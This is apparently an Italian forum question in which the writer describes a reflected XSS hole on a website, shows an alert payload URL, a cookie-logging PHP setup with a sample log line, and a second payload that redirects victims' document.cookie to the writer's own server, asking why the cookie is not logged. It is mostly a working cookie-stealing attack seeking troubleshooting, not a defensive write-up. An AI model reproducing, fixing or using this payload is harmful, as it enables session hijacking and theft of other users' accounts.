Ho appena trovato un sito Web con una vulnerabilità XSS. Quando visito il seguente URL, si verifica un pop up:
https://example.com/article/HALLOWEEN"><script>alert(1);</script>
Ho un cookielogger.php sul mio server con questo codice , così che quando visito myserver.com/key.php
, viene aggiunta una riga a myserver.com/log.txt
come questo:
IP: 15x.1xx.xxx.xx | PORT: 58554 | HOST: | Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 | METHOD: | REF: | DATE: Friday 21st 2018f September 2018 07:34:25 PM | COOKIE:
Ma quando modifico il mio URL su questo sotto, il cookie non è registrato sul mio server
https://example.com/article/HALLOWEEN"><script language= "JavaScript">document.location="http://myserver.com/key.php?cookie=" + document.cookie;</script>